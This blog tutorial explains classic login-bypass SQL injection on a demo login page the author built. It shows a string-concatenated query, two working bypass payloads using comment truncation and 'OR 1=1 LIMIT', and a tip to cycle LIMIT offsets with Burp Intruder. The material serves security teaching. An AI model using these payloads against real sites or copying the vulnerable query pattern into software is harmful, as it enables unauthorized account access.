SQL Injection · Vulnerabilities

Classic SQL Injection

admin

This kind of SQL Injection happens whenever a website’s input fields, such as the search box, login page, comment forms, etc., are present.

Below is the screenshot of the login page that I have made to demonstrate the Classical Login-based SQL injection

Depending on the website or application, the Login Page SQL query will be specific. On the other hand, a query in the backend for the above Login page might resemble this:

SELECT * FROM users WHERE user_name=’$uname’ AND password=’$pass’;

So what is happening behind?

Whenever the user inputs the username and password direct Goes into the query so it is not verifying the user inputs the End user can input whatever they like So this makes this login page vulnerable to SQL injection

Now How to exploit it?

Exploit-1 (When we know the username as “admin”)

Let’s say I have entered,

Payload for username >> “admin’ AND 1=1– “
Payload for Password >> “wfw”

So the resultant query will be

SELECT * FROM users WHERE user_name=’admin’ AND 1=1– ’ AND password=’wfw’;

When the query is executed, it will look for the username “admin” in the “users” table. If any row matches that username and is equal to “admin,” it will log in because the rest of the query, “1=1,” is always True. Therefore, we can conclude that the aforementioned query will only be exploited if we are aware of at least one username and that when it executes, the statements that come after “– “{Not space after comment it is because of MySQL database} will not be executed.

So the query will be executed by the database is:-

SELECT * FROM users WHERE user_name=’admin’ AND 1=1;

And the part of the query which is counted as a comment is:-

’ AND password=’wfw’;

We will therefore be logged in as “admin” by using the payload above because we are aware that there is one user with the username admin.

Exploit-2 (When we Don’t know the username)

Let’s say I have entered,

Payload for username >> “xyz’ OR 1=1 Limit 0,1– “
Payload for Password >> “xyz”

So the resultant query will be

SELECT * FROM users WHERE user_name=’xyz’ OR 1=1 Limit 0,1– ’ AND password=’xyz’;

The query will search the “users” table for the username “xyz,” but I don’t see any rows with that username. As a result, it will return all of the rows in the output because the rest of the query, “1=1,” is always True. Therefore, we must add the expression “Limit 0, 1” to restrict the output to just one row in order for us to be able to log in.

So the query will be executed by the database is:-

SELECT * FROM users WHERE user_name=’xyz’ OR 1=1 Limit 0,1;

And the part of the query which is counted as a comment is:-

’ AND password=’xyz’;

We will therefore be logged in as the First user in the “users” table by using the above payload. So to find the “admin” user from the table we will have to find it by changing Payload Like this. {Limit 0,1 ,Limit 1,1 ,Limit 2,1 ,Limit 3,1}.

We can you the tool called Burpsuite Intruder Brutforce.

Leave a Reply

Your email address will not be published. Required fields are marked *